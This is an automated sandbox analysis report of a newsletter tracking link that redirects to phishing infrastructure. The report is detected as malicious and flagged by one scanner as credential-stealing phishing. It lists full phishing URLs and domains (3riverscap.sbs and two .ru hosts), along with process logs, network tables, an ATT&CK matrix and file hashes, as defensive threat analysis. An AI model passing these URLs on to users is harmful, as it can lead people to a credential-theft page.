Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://link.mail.beehiiv.com/ls/click?upn=u001.KDDa4SKH91gcnCIm13FUDjBk8DnozwkSdxe-2BLMCJAa8TiKDhd-2B38pl782PnlKrmgzQTjD8fATdnwc5QgneqdUjWYx5D82QC2JajKOD5dhwQf6nBS9x6PxACdxqZ-2BVvfXSFr536dEl71Z4-2B0lKXrlBq2I7OGOUfe9d0qU6CGc-2Fmfk3q0WwhO42BOQi8aYKh6VoV-2Fvh8sTRNP-2FzICpX0YMfHxlEW7fbg9SV-2BZbNdkv2-2Fpl72tpteDYdTlwajVUY00F0PHA_ZF37BJsSpeg2ggKro0Kw1JZi2Q7X5lMR4GcQUR-2F5GPPdktqhJXeC-2Bsy71uIylML6XXkLS1FYaxFM495ZF5HfT0kw37Vy5JEgIau55HagsDPP2WniEKQdRVUyQJDaH4w-2F2p6KuwGHUKUEB38nhc92t8hXLjbu-2FxKQqxpAf-2FIB1EdEcuDPVgMcwWoZKV6-2FqV3HrDnxqjceVv4CXxtjZ2JkO-2FUQ9O68DpCM-2F5dMvT-2FayKu2U6pF5JC6uPW18Z2ptqBTGPNdoimmFZuTI-2BzLIJuacRYcsFhvk-2FwCd5-2FfgR9VaRTivmwUCmaQtKoAP0BOnzwqcmyDGFhpcYOdxVqyJWSy-2B743S17rkeGe7waWwJLboNXwyMd-2B9s8I3MOfBk2TtelNM0qBGTIKvZZMmOPaGvvxbvCz8i7Yz-2FsuCfpo46vACb3GxE1l0-2FAMv8NYCoN3rK-2Bb"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1976,i,15468630849517401566,4594453010131145192,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://link.mail.beehiiv.com/ls/click?upn=u001.KDDa4SKH91gcnCIm13FUDjBk8DnozwkSdxe-2BLMCJAa8TiKDhd-2B38pl782PnlKrmgzQTjD8fATdnwc5QgneqdUjWYx5D82QC2JajKOD5dhwQf6nBS9x6PxACdxqZ-2BVvfXSFr536dEl71Z4-2B0lKXrlBq2I7OGOUfe9d0qU6CGc-2Fmfk3q0WwhO42BOQi8aYKh6VoV-2Fvh8sTRNP-2FzICpX0YMfHxlEW7fbg9SV-2BZbNdkv2-2Fpl72tpteDYdTlwajVUY00F0PHA_ZF37BJsSpeg2ggKro0Kw1JZi2Q7X5lMR4GcQUR-2F5GPPdktqhJXeC-2Bsy71uIylML6XXkLS1FYaxFM495ZF5HfT0kw37Vy5JEgIau55HagsDPP2WniEKQdRVUyQJDaH4w-2F2p6KuwGHUKUEB38nhc92t8hXLjbu-2FxKQqxpAf-2FIB1EdEcuDPVgMcwWoZKV6-2FqV3HrDnxqjceVv4CXxtjZ2JkO-2FUQ9O68DpCM-2F5dMvT-2FayKu2U6pF5JC6uPW18Z2ptqBTGPNdoimmFZuTI-2BzLIJuacRYcsFhvk-2FwCd5-2FfgR9VaRTivmwUCmaQtKoAP0BOnzwqcmyDGFhpcYOdxVqyJWSy-2B743S17rkeGe7waWwJLboNXwyMd-2B9s8I3MOfBk2TtelNM0qBGTIKvZZMmOPaGvvxbvCz8i7Yz-2FsuCfpo46vACb3GxE1l0-2FAMv8NYCoN3rK-2Bb0%Avira URL Cloudsafe
https://link.mail.beehiiv.com/ls/click?upn=u001.KDDa4SKH91gcnCIm13FUDjBk8DnozwkSdxe-2BLMCJAa8TiKDhd-2B38pl782PnlKrmgzQTjD8fATdnwc5QgneqdUjWYx5D82QC2JajKOD5dhwQf6nBS9x6PxACdxqZ-2BVvfXSFr536dEl71Z4-2B0lKXrlBq2I7OGOUfe9d0qU6CGc-2Fmfk3q0WwhO42BOQi8aYKh6VoV-2Fvh8sTRNP-2FzICpX0YMfHxlEW7fbg9SV-2BZbNdkv2-2Fpl72tpteDYdTlwajVUY00F0PHA_ZF37BJsSpeg2ggKro0Kw1JZi2Q7X5lMR4GcQUR-2F5GPPdktqhJXeC-2Bsy71uIylML6XXkLS1FYaxFM495ZF5HfT0kw37Vy5JEgIau55HagsDPP2WniEKQdRVUyQJDaH4w-2F2p6KuwGHUKUEB38nhc92t8hXLjbu-2FxKQqxpAf-2FIB1EdEcuDPVgMcwWoZKV6-2FqV3HrDnxqjceVv4CXxtjZ2JkO-2FUQ9O68DpCM-2F5dMvT-2FayKu2U6pF5JC6uPW18Z2ptqBTGPNdoimmFZuTI-2BzLIJuacRYcsFhvk-2FwCd5-2FfgR9VaRTivmwUCmaQtKoAP0BOnzwqcmyDGFhpcYOdxVqyJWSy-2B743S17rkeGe7waWwJLboNXwyMd-2B9s8I3MOfBk2TtelNM0qBGTIKvZZMmOPaGvvxbvCz8i7Yz-2FsuCfpo46vACb3GxE1l0-2FAMv8NYCoN3rK-2Bb100%SlashNextCredential Stealing type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://uxxrejmt6jqxcuujcxblqanwhjvd5pcl9nswmcr2amxwat4lija5ohuixy2.bfcgpixdwnw.ru/384603737182923034134733HBIvtgFvMdHIJNXFWYVMFPBUZFKSEIVKZFXFTFPINW0%Avira URL Cloudsafe
https://3riverscap.sbs/cdn-cgi/challenge-platform/h/b/scripts/jsd/a6e12e96a2d5/main.js?0%Avira URL Cloudsafe
https://7x7.jaaqwamco.ru/favicon.ico0%Avira URL Cloudsafe
https://3riverscap.sbs/cdn-cgi/challenge-platform/h/b/jsd/r/8e8c6e58cb1b43b20%Avira URL Cloudsafe
https://3riverscap.sbs/cdn-cgi/challenge-platform/scripts/jsd/main.js0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    high
    code.jquery.com
    151.101.2.137
    truefalse
      high
      cdnjs.cloudflare.com
      104.17.24.14
      truefalse
        high
        link.mail.beehiiv.com
        104.18.69.40
        truefalse
          high
          3riverscap.sbs
          162.159.140.160
          truefalse
            high
            challenges.cloudflare.com
            104.18.95.41
            truefalse
              high
              www.google.com
              172.217.21.36
              truefalse
                high
                7x7.jaaqwamco.ru
                172.67.180.192
                truefalse
                  unknown
                  uxxrejmt6jqxcuujcxblqanwhjvd5pcl9nswmcr2amxwat4lija5ohuixy2.bfcgpixdwnw.ru
                  172.67.189.38
                  truefalse
                    high
                    assets.onestore.ms
                    unknown
                    unknownfalse
                      high
                      ajax.aspnetcdn.com
                      unknown
                      unknownfalse
                        high
                        c.s-microsoft.com
                        unknown
                        unknownfalse
                          high
                          www.sharepoint.com
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://uxxrejmt6jqxcuujcxblqanwhjvd5pcl9nswmcr2amxwat4lija5ohuixy2.bfcgpixdwnw.ru/384603737182923034134733HBIvtgFvMdHIJNXFWYVMFPBUZFKSEIVKZFXFTFPINWfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://code.jquery.com/jquery-3.6.0.min.jsfalse
                              high
                              https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                high
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e8c6e9b1b1b437a&lang=autofalse
                                  high
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8e8c6e9b1b1b437a/1732650888673/1F1YFoCiLDS1z55false
                                    high
                                    https://7x7.jaaqwamco.ru/favicon.icofalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://a.nel.cloudflare.com/report/v4?s=GrEtKVGQwjzk%2BBxci6cI337FKcg7z1h%2B6pzs76O5RZkAT8L2j3orsvLARkBEovfpGzetT8Lh9UtiOZeWhQ6vGUgvBi6JAJqCAqFSEgnq17GGqIGn%2FYUbrOrrIyJiIQ%3D%3Dfalse
                                      high
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8e8c6e9b1b1b437a/1732650888673/83ef82c9ae1c1fab2ef43382ed78a78a49b63bd8d8160e9d4219cba19b858457/w15JzClzjgpXyEVfalse
                                        high
                                        https://3riverscap.sbs/cdn-cgi/challenge-platform/scripts/jsd/main.jsfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://a.nel.cloudflare.com/report/v4?s=3lhmd%2F40r6kamzJDBBPOlGe9MkjbmYpNXHlgjtGyM395U2bldkADhRdbF5JNgSKY3VR0kY2UjP7AQpddk6%2F3FhbvcUl33WQVNKEn7r7NgnlA2qmwj6IiPBgPnPzm2IYJcg%3D%3Dfalse
                                          high
                                          https://3riverscap.sbs/cdn-cgi/challenge-platform/h/b/scripts/jsd/a6e12e96a2d5/main.js?false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                            high
                                            https://3riverscap.sbs/?utm_source=sveinbjrns-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=role-in-personio&_bhlid=194647ae141a6db4016401a3d42ac64bc1afe425false
                                              unknown
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/lgd21/0x4AAAAAAA0MpIT_R9fG8S2s/auto/fbE/normal/auto/false
                                                high
                                                https://a.nel.cloudflare.com/report/v4?s=%2FJj3BHS6BdRRwSol2VxrGNHdB1ar43mO%2FviGjuRVKJa6l9ZNtA7Wd5v6lAg6jlIK8TBYxsFYNMonVnTxuHvrO1%2FkhXf05uAJmMVsaml%2B4%2FImZPpZr%2BIYwICxCItEmJkC3Q%3D%3Dfalse
                                                  high
                                                  https://3riverscap.sbs/cdn-cgi/challenge-platform/h/b/jsd/r/8e8c6e58cb1b43b2false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://a.nel.cloudflare.com/report/v4?s=EhJ8uA%2B05xg77Cuv5PIyJjys5ieokbM9QK7zd7ZqM6PZ8N96UGot3IM6R%2BarFu8Esxi3K%2BTF7MdMZXJlH76ftTI%2B4GMoOA%2F%2F4pgStl1ZF5enITVZcwGQB5UYr5qU%2BtQZNQ%3D%3Dfalse
                                                    high
                                                    https://challenges.cloudflare.com/turnstile/v0/b/a6e12e96a2d5/api.jsfalse
                                                      high
                                                      https://7x7.jaaqwamco.ru/Sb3OEcu/false
                                                        unknown
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://outlook.live.com/owa/chromecache_83.1.dr, chromecache_96.1.drfalse
                                                          high
                                                          https://www.skype.com/en/chromecache_83.1.dr, chromecache_96.1.drfalse
                                                            high
                                                            https://products.office.com/en-us/homechromecache_83.1.dr, chromecache_96.1.drfalse
                                                              high
                                                              https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.cchromecache_83.1.dr, chromecache_96.1.drfalse
                                                                high
                                                                https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jschromecache_83.1.dr, chromecache_96.1.drfalse
                                                                  high
                                                                  https://onedrive.live.com/about/en-us/chromecache_83.1.dr, chromecache_96.1.drfalse
                                                                    high
                                                                    https://products.office.com/en-us/microsoft-teams/free?icid=SSM_AS_Promo_Apps_MicrosoftTeamschromecache_83.1.dr, chromecache_96.1.drfalse
                                                                      high
                                                                      https://www.onenote.com/chromecache_83.1.dr, chromecache_96.1.drfalse
                                                                        high
                                                                        https://www.xbox.com/chromecache_96.1.drfalse
                                                                          high
                                                                          http://schema.org/Organizationchromecache_83.1.dr, chromecache_96.1.drfalse
                                                                            high
                                                                            http://github.com/requirejs/almond/LICENSEchromecache_104.1.dr, chromecache_91.1.drfalse
                                                                              high
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              172.217.21.36
                                                                              www.google.comUnited States
                                                                              15169GOOGLEUSfalse
                                                                              35.190.80.1
                                                                              a.nel.cloudflare.comUnited States
                                                                              15169GOOGLEUSfalse
                                                                              172.66.0.158
                                                                              unknownUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              172.67.189.38
                                                                              uxxrejmt6jqxcuujcxblqanwhjvd5pcl9nswmcr2amxwat4lija5ohuixy2.bfcgpixdwnw.ruUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              172.67.180.192
                                                                              7x7.jaaqwamco.ruUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              104.17.24.14
                                                                              cdnjs.cloudflare.comUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              104.18.95.41
                                                                              challenges.cloudflare.comUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              162.159.140.160
                                                                              3riverscap.sbsUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              151.101.2.137
                                                                              code.jquery.comUnited States
                                                                              54113FASTLYUSfalse
                                                                              239.255.255.250
                                                                              unknownReserved
                                                                              unknownunknownfalse
                                                                              104.18.69.40
                                                                              link.mail.beehiiv.comUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              104.17.25.14
                                                                              unknownUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              IP
                                                                              192.168.2.17
                                                                              192.168.2.16
                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1563345
                                                                              Start date and time:2024-11-26 20:53:50 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 3m 34s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                              Sample URL:https://link.mail.beehiiv.com/ls/click?upn=u001.KDDa4SKH91gcnCIm13FUDjBk8DnozwkSdxe-2BLMCJAa8TiKDhd-2B38pl782PnlKrmgzQTjD8fATdnwc5QgneqdUjWYx5D82QC2JajKOD5dhwQf6nBS9x6PxACdxqZ-2BVvfXSFr536dEl71Z4-2B0lKXrlBq2I7OGOUfe9d0qU6CGc-2Fmfk3q0WwhO42BOQi8aYKh6VoV-2Fvh8sTRNP-2FzICpX0YMfHxlEW7fbg9SV-2BZbNdkv2-2Fpl72tpteDYdTlwajVUY00F0PHA_ZF37BJsSpeg2ggKro0Kw1JZi2Q7X5lMR4GcQUR-2F5GPPdktqhJXeC-2Bsy71uIylML6XXkLS1FYaxFM495ZF5HfT0kw37Vy5JEgIau55HagsDPP2WniEKQdRVUyQJDaH4w-2F2p6KuwGHUKUEB38nhc92t8hXLjbu-2FxKQqxpAf-2FIB1EdEcuDPVgMcwWoZKV6-2FqV3HrDnxqjceVv4CXxtjZ2JkO-2FUQ9O68DpCM-2F5dMvT-2FayKu2U6pF5JC6uPW18Z2ptqBTGPNdoimmFZuTI-2BzLIJuacRYcsFhvk-2FwCd5-2FfgR9VaRTivmwUCmaQtKoAP0BOnzwqcmyDGFhpcYOdxVqyJWSy-2B743S17rkeGe7waWwJLboNXwyMd-2B9s8I3MOfBk2TtelNM0qBGTIKvZZMmOPaGvvxbvCz8i7Yz-2FsuCfpo46vACb3GxE1l0-2FAMv8NYCoN3rK-2Bb
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:13
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Detection:MAL
                                                                              Classification:mal48.win@24/58@50/14
                                                                              EGA Information:Failed
                                                                              HCA Information:
                                                                              • Successful, ratio: 100%
                                                                              • Number of executed functions: 0
                                                                              • Number of non-executed functions: 0
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 93.184.221.240, 216.58.208.227, 172.217.19.238, 64.233.165.84, 34.104.35.123, 20.76.201.171, 20.112.250.133, 20.236.44.162, 20.231.239.246, 20.70.246.20, 2.16.229.126, 152.199.19.160, 2.19.126.162, 2.19.126.142, 104.121.5.198, 2.19.126.141, 2.19.126.155, 184.28.89.233, 172.217.17.35, 88.221.169.152, 104.85.32.240, 172.217.17.78
                                                                              • Excluded domains from analysis (whitelisted): assets.onestore.ms.edgekey.net, slscr.update.microsoft.com, sharepoint.microsoft.com, e13678.dscb.akamaiedge.net, clientservices.googleapis.com, a1449.dscg2.akamai.net, wu.azureedge.net, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, www.microsoft.com-c-3.edgekey.net, clients2.google.com, mscomajax.vo.msecnd.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu-b-net.trafficmanager.net, a1778.g2.akamai.net, e10583.dspg.akamaiedge.net, clients1.google.com, fs.microsoft.com, accounts.google.com, ctldl.windowsupdate.com.delivery.microsoft.com, cs22.wpc.v0cdn.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, statics-marketingsites-wcus-ms-com.akamaized.net, assets.onestore.ms.akadns.net, fe3cr.delivery.mp.microsoft.com, c-s.cms.ms.akadns.net, edgedl.me.gvt1.com, c.s-microsoft.com-c.edgekey.net, e13678.dscg.akamaiedge.net, clients.l.google.com, az72
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              • VT rate limit hit for: https://link.mail.beehiiv.com/ls/click?upn=u001.KDDa4SKH91gcnCIm13FUDjBk8DnozwkSdxe-2BLMCJAa8TiKDhd-2B38pl782PnlKrmgzQTjD8fATdnwc5QgneqdUjWYx5D82QC2JajKOD5dhwQf6nBS9x6PxACdxqZ-2BVvfXSFr536dEl71Z4-2B0lKXrlBq2I7OGOUfe9d0qU6CGc-2Fmfk3q0WwhO42BOQi8aYKh6VoV-2Fvh8sTRNP-2FzICpX0YMfHxlEW7fbg9SV-2BZbNdkv2-2Fpl72tpteDYdTlwajVUY00F0PHA_ZF37BJsSpeg2ggKro0Kw1JZi2Q7X5lMR4GcQUR-2F5GPPdktqhJXeC-2Bsy71uIylML6XXkLS1FYaxFM495ZF5HfT0kw37Vy5JEgIau55HagsDPP2WniEKQdRVUyQJDaH4w-2F2p6KuwGHUKUEB38nhc92t8hXLjbu-2FxKQqxpAf-2FIB1EdEcuDPVgMcwWoZKV6-2FqV3HrDnxqjceVv4CXxtjZ2JkO-2FUQ9O68DpCM-2F5dMvT-2FayKu2U6pF5JC6uPW18Z2ptqBTGPNdoimmFZuTI-2BzLIJuacRYcsFhvk-2FwCd5-2FfgR9VaRTivmwUCmaQtKoAP0BOnzwqcmyDGFhpcYOdxVqyJWSy-2B743S17rkeGe7waWwJLboNXwyMd-2B9s8I3MOfBk2TtelNM0qBGTIKvZZMmOPaGvvxbvCz8i7Yz-2FsuCfpo46vACb3GxE1l0-2FAMv8NYCoN3rK-2Bb
                                                                              No simulations
                                                                              No context
                                                                              No context
                                                                              No context
                                                                              No context
                                                                              No context
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 26 18:54:25 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):2673
                                                                              Entropy (8bit):3.992243150435343
                                                                              Encrypted:false
                                                                              SSDEEP:48:8ddjTLT7HsidAKZdA1FehwiZUklqehvty+3:8TDWGy
                                                                              MD5:ADE1C9AE48BCAFA17397EB698AB0F6A5
                                                                              SHA1:319225FC17532FFFEF0634DCE50A8D20CE6B54EB
                                                                              SHA-256:FBE72802A633BC9D99520A8A997EFB1AE12804CB6782110A74D095EB38C68302
                                                                              SHA-512:22EC38C72E1A83BF19744BB689B9245FEDF05905B3692C4B49999D2B75CDC8FA850BEDC92E66BB52B882B16766E971DCAF8C78E05D35812BF16DE450DA67568B
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:L..................F.@.. ...$+.,.....r..<@..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IzY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VzY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VzY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VzY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VzY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............G4.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 26 18:54:25 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):2675
                                                                              Entropy (8bit):4.010522579411808
                                                                              Encrypted:false
                                                                              SSDEEP:48:8xGdjTLT7HsidAKZdA1seh/iZUkAQkqehwty+2:8QDw9Qby
                                                                              MD5:5D35DF37F56BF9B8D2533C1A3932B656
                                                                              SHA1:BD755C2EFE12C432D09DC7894402441478951EF3
                                                                              SHA-256:0B9E65CD9E54B8C0B1801E1162F172BE2E1E06B4749F7807AB6DAA056334FDE0
                                                                              SHA-512:F0FAC639D87F9E7DA31962BAD3591E2B8CDF1AC3894B054CC76C35DB7203FDDB55FE6ED0C1D6F4DA22C6FEE0977283FF42C936BD4984D90EF3C4B1B04B80BC51
                                                                              Malicious:false
                                                                              Reputation:low
